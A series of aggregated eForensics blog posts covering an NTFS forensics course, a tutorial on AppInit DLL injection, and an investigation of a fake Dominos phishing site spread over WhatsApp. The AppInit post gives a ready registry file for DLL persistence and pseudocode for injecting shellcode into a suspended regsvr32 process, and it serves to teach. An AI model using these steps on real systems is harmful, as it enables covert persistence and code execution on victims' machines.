If AI isn't offering the tech that you are looking for, but you would like to increase your service desk efficiency, then what do you do? Automation is a good place to start. Automation has always been a relevant topic, and it has become closely tied to AI: in 2019 the two were frequently mentioned together in presentations, blog articles, and at industry events. Organisations are always looking for relevance and instant benefits. One form of smart automation that is gaining popularity is robotic process automation (RPA), which involves programming a piece of software to carry out repetitive tasks, such as handling orders or expense requests received through an intranet form.

RPA can allow your staff to spend far more time doing what they are actually good at, and it also gives you the chance to provide a very good level of customer service. It is expected that even more service desks will explore and implement automation solutions in the next year or two.

The post ITSM Solutions Security Trends to Watch out for appeared first on eForensics.

File System Tunneling [FREE COURSE CONTENT]


In this video from our NTFS Forensics course, our instructor, Divya Lakshmanan, explains what file system tunneling is. This concept is important to understand when doing forensics on Windows machines, and it can save you some headaches, for sure. Enjoy the video!



Every degree course on Digital Forensics begins with a study of File System Forensics, which invariably includes a module on the New Technology File System used by Windows operating systems. At present, the competitive job market looks for professionals who can 'do one thing well': regardless of the amount of theoretical knowledge you have, practical knowledge and hands-on training set you apart from your peers. If you wish to learn the internals of the NT file system and how to perform forensic procedures on it, then this is your go-to course.

What will you learn?

  • Internals of the New Technology File System
  • How the various data structures are organized within the NT File System
  • How to interpret the data structures, thereby perceiving how file storage is done by NTFS
  • How to perform File System Forensics on NTFS

What skills will you gain?

  • File carving on NTFS, for data recovery or forensics.
  • Ability to decipher hexadecimal data efficaciously
  • Competence to write custom scripts that can be added as plugins to formal forensic tools
  • Endurance to operate with hexadecimal data!

Topics covered: 

Introduction to NT File System, How to forensically approach NT File System, $Boot File, $MFT File, $Volume File, $AttrDef File, $Bitmap File, $. (root) File, Resident File, Non-resident File, Directory, Behaviour on file/directory deletion, Behaviour of NT File System on Linux, File System Journaling, File System Tunneling, Object Identifiers, Links – soft links, hard links, junctions, Sparse Files, Compressed Files, Encryption, Access Control Lists, Alternate Data Streams, The Sleuth Kit Tool Suite against NTFS, How to approach forensics of an NTFS forensic image



The post File System Tunneling [FREE COURSE CONTENT] appeared first on eForensics.

AppInit DLL injection | By Siddharth Sharma


AppInit DLL injection

Recently, some earlier versions of the Ramsay malware (malware capable of operating within air-gapped networks) used AppInit DLLs for persistence during the attack phase. AppInit_DLLs is a registry value: when it is set to point at an attacker's DLL, any application in the system that loads User32.dll will load the attacker's DLL as well. The AppInit DLL injection technique has been used by adversaries for a long time, mainly to gain persistence during the attack phase.

In this short blog post we will use a simple example to show how, through this technique, opening Command Prompt pops up the calculator. First we specify the target DLL in the AppInit registry value:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs = ‘path_to_your_dll‘

And then we enable the mechanism:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\LoadAppInit_DLLs = 1

An attacker could simply use a batch script to enable this on the victim PC. Once both values are set, any application that loads User32.dll will also load the attacker's DLL (in this case, our DLL is appinit.dll on the D: drive, as highlighted above). The injected DLL might contain shellcode or perform other malicious activities.
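As mentioned, an attacker could set both values with a batch script or an equivalent .reg file. A minimal sketch of such a .reg file, using the D:\appinit.dll path from this example:

```reg
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"AppInit_DLLs"="D:\\appinit.dll"
"LoadAppInit_DLLs"=dword:00000001
```

Note that on Windows 8 and later, these values are ignored when Secure Boot is enabled, which limits the technique on modern systems.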

Practical Example:

The code images below are of our sample DLL, which contains the shellcode:

Starting with DllMain function:

For this example, I have kept cmd.exe as the target, but attackers could just as easily use any other running process that loads User32.dll. After that, we have a chkprocess function that compares the name of the opened process with the string 'cmd'; if it matches, the shellcode is injected into the cmd.exe process.

The code snippet above shows the injected() function. First we create a process in suspended mode with regsvr32.exe as the command line (chosen because it is a whitelisted binary). Then we capture the context of the process's thread using GetThreadContext() so that we can later set the Eip/Rip register. Next we allocate space for our shellcode with VirtualAllocEx() (since it is a remote process), and write the shellcode into that space with WriteProcessMemory(). Finally, after pointing Eip at the shellcode's entry point, we resume the thread to continue execution.
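The sequence described above can be summarised in pseudocode (names and parameters are simplified from the article's description):

```
// inside the injected DLL, once chkprocess() has matched "cmd"
pi  = CreateProcess("regsvr32.exe", CREATE_SUSPENDED)   // benign-looking host process
ctx = GetThreadContext(pi.hThread)                      // capture context to reach Eip/Rip
mem = VirtualAllocEx(pi.hProcess, sizeof(shellcode), PAGE_EXECUTE_READWRITE)
WriteProcessMemory(pi.hProcess, mem, shellcode, sizeof(shellcode))
ctx.Eip = mem                                           // point instruction pointer at shellcode
SetThreadContext(pi.hThread, ctx)
ResumeThread(pi.hThread)                                // execution continues at the shellcode
```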

NOTE: For parameter details, kindly refer to Microsoft's MSDN documentation.

Shellcode that gets injected and pops calc.exe:

DEMO:

As we can see above, when I launched cmd, calc popped up, and on inspecting the properties of cmd I found that our module (appinit.dll) had been loaded as well.

Endgame has already published an analysis of this type of infection, showing how this kind of injection can be detected.

References:

https://attack.mitre.org/techniques/T1103/

Microsoft MSDN

About Siddharth:

  • Interested in cybersecurity; his blog: https://threatblogs.wordpress.com/
  • Student currently pursuing a Bachelor of Technology (Computer Science)
  • Interested in malware analysis, reversing, and forensics
  • Interned at the Computer Emergency Response Team, India (CERT-In)

The post AppInit DLL injection | By Siddharth Sharma appeared first on eForensics.

New spam / phishing campaign on Whatsapp – investigating fake Dominos pizza websites | By Maciej Makowski


New spam / phishing campaign on Whatsapp – investigating fake Dominos pizza websites

This week’s focus is an impromptu investigation sparked by another reader submission.

This is the message that one of the readers received today on Whatsapp:

The domain looks deceptively in order – after all, the real Dominos website in Ireland is www.dominos.ie….

Looks legit, right?

Well, not exactly. To understand what we're looking at here, a quick explanation of web domain addressing structure is in order.

Every valid Internet domain name comprises the following components:

  1. Top level domain – whatever follows the last dot in the URL string. Common top level domain examples are: .com, .org, .gov, .net, .uk, .ie… And in this case, it's .club.
  2. Second level domain – whatever comes before the top level domain. So, the second level domain of this blog is osintme and the top level domain is .com. In our example, the second level domain is ie-pizza (yes, a hyphen is the only special character allowed by the domain naming convention).
  3. Subdomain – whatever is positioned before the second level domain. It can be anything, really – for example, in aws.amazon.com the aws part is the subdomain. And in our case, the subdomain is dominos.

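The breakdown above can be sketched in a few lines of Python (a naive split that ignores multi-part TLDs such as .co.uk):

```python
def split_domain(hostname: str):
    """Naively split a hostname into (subdomain, second_level, top_level)."""
    parts = hostname.lower().split(".")
    tld = parts[-1]             # whatever follows the last dot
    sld = parts[-2]             # the registered name
    sub = ".".join(parts[:-2])  # everything in front of it (may be empty)
    return sub, sld, tld

# The scam URL from the message: the registered domain is ie-pizza.club,
# and "dominos" is merely a subdomain chosen by the scammers.
print(split_domain("dominos.ie-pizza.club"))  # ('dominos', 'ie-pizza', 'club')
print(split_domain("aws.amazon.com"))         # ('aws', 'amazon', 'com')
```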
Visually it can be very confusing, and I would not blame people for believing this could be a real Dominos Pizza website – because at first glance, it does look real.

A quick check using who.is reveals that the domain was registered only yesterday (21st May 2020).

It was registered using namecheap, a US-based hosting company whose services are known to be frequently abused by scammers and cyber criminals.

So before I proceeded any further, I fired off an email to namecheap, just to let them know somebody is hosting a scam website using their service.

abuse@namecheaphosting.com

Visual examination of the domain in a safe virtual machine environment only confirms this is a scam:

I was expecting malicious content so I scanned the website using two very solid malware analysis platforms. The results for both scans are available below:

Any.Run:

https://app.any.run/tasks/b5fdaee3-39e5-4be1-9d68-6a3bd55e2611/

… and Virus Total:

https://www.virustotal.com/gui/url/440b4a6a5ec27fe188ac2a4f810f4a72759b0bf31ac9bd014693718a06e283b1/detection

At the time of writing, there was no malicious software detected on the site by either of those malware analysis services.

I interacted with the website in several ways but could not identify any functionality that would lead me to believe the site harvested login credentials, financial or personal information.

It was time to dig deeper into the source code.

In previous posts I mentioned the use of the F12 key for investigating websites.

Pressing F12 switches on Web Developer mode on a website you are currently viewing in your browser (known as Developer Tools in both Google Chrome and Microsoft Edge).

Some useful information was gleaned after inspecting the target website:

1. Geoplugin and redirections to other websites

The website contains a simple Javascript that utilises geoplugin.net to geolocate a user’s IP address and redirect to other websites, depending on the user’s location:

This is a valuable discovery as suddenly we reveal 4 other websites associated with this scam.
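The script's logic amounts to a country-code lookup followed by a redirect. A rough Python equivalent of the idea (the real code runs as JavaScript in the victim's browser, and the destination URLs here are placeholders, not the actual scam domains):

```python
# Rough equivalent of the scam page's geoplugin-based redirect logic.
# The URLs are placeholders for illustration only.
REDIRECTS = {
    "IT": "https://scam-clone.invalid/it",  # the Italian-language clone
    "IN": "https://scam-clone.invalid/in",  # the Indian "free Adidas" variant
}
DEFAULT = "https://scam-clone.invalid/en"   # English-language clones

def pick_redirect(country_code: str) -> str:
    """Return the clone site a visitor from this country would be sent to."""
    return REDIRECTS.get(country_code.upper(), DEFAULT)

print(pick_redirect("it"))  # Italian visitors get the Italian clone
print(pick_redirect("fr"))  # everyone else falls through to the default
```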

Note how the Italian site is the only non-English option out of them all. Perhaps this could indicate that the persons behind this scam are Italian? Or Spanish, given the elements of the Spanish language here and there in the source code (wild speculation, I know).

The scam websites are all direct clones, and all but one impersonate the Dominos Pizza website – the exception is the Indian version served to any user with an Indian IP, which offers a false promise of free Adidas merchandise:


2. Browser user agent scan

When you interact with the fake website, it calls a function to scan your browser user agent.

I have previously talked about user fingerprinting conducted by websites here.

Essentially, the scam website detects if a user is accessing the site from a mobile device and it prompts the Whatsapp mobile app to share the link.

If you access the site via a desktop browser, this will not work.
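Mobile detection of this kind usually boils down to a regular expression over the User-Agent header. A minimal Python sketch of the idea (the pattern is illustrative, not the site's actual code, which is JavaScript):

```python
import re

# Illustrative pattern; real sites often match many more device tokens.
MOBILE_RE = re.compile(r"Android|iPhone|iPad|Mobile", re.IGNORECASE)

def is_mobile(user_agent: str) -> bool:
    """Return True if the user agent looks like a mobile browser."""
    return bool(MOBILE_RE.search(user_agent))

desktop_ua = "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
phone_ua = "Mozilla/5.0 (Linux; Android 10) Mobile Safari/537.36"
print(is_mobile(desktop_ua), is_mobile(phone_ua))  # False True
```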

3. Fake user reviews

You have probably noticed the presence of “user reviews” praising the seemingly legitimate giveaway under the sharing buttons.

They do look fake, but how do they work?

The website is utilising the randomuser.me API to pull in 5 randomly generated users, and it pairs each of them with a short made-up review text:
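The mechanism is easy to reproduce offline: pair a canned review string with each record from a randomuser.me-style response. A sketch with stubbed data (the names and review texts below are invented for illustration; the real page fetches users over HTTP):

```python
import random

# Stubbed stand-in for a randomuser.me API response (normally fetched over HTTP).
fake_api_results = [
    {"name": {"first": "Anna", "last": "Rossi"}},
    {"name": {"first": "John", "last": "Smith"}},
    {"name": {"first": "Priya", "last": "Patel"}},
]

# Invented review texts, similar in spirit to the scam page's canned praise.
REVIEW_TEXTS = [
    "Got my free pizza, thanks!",
    "Wasn't sure at first but it worked.",
    "Shared with my friends, great deal.",
]

def build_fake_reviews(users, texts):
    """Pair each 'user' with a review string, as the scam page does."""
    return [
        {"reviewer": f"{u['name']['first']} {u['name']['last']}", "text": t}
        for u, t in zip(users, random.sample(texts, len(users)))
    ]

for review in build_fake_reviews(fake_api_results, REVIEW_TEXTS):
    print(review)
```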


4. Cookies

Cookies can be used for tracking and this website has several of those.

I don’t believe in this case they are a huge threat, but it’s always recommended to block cookies.

I personally use the uBlock Origin plugin and it does the job very well.


Concluding thoughts: right now the Dominos scam website appears to have only spam proliferation functionality, but this can change, as the site is very new (only 1 day old at the time of writing).

The scammers can monitor the scale of user interaction with the URL and based on that they can adapt their tactics, ranging from phishing for logins and passwords to deploying malware on users’ phones.

The more people report this scam to the hosting provider, the better the chance that namecheap removes and blacklists the scammers.

I would encourage you all to individually email abuse@namecheaphosting.com and report the site to them.

Remain safe and until the next time.

Originally published: https://www.osintme.com/index.php/2020/05/22/new-spam-phishing-campaign-on-whatsapp-investigating-fake-dominos-pizza-websites/

The post New spam / phishing campaign on Whatsapp – investigating fake Dominos pizza websites | By Maciej Makowski appeared first on eForensics.
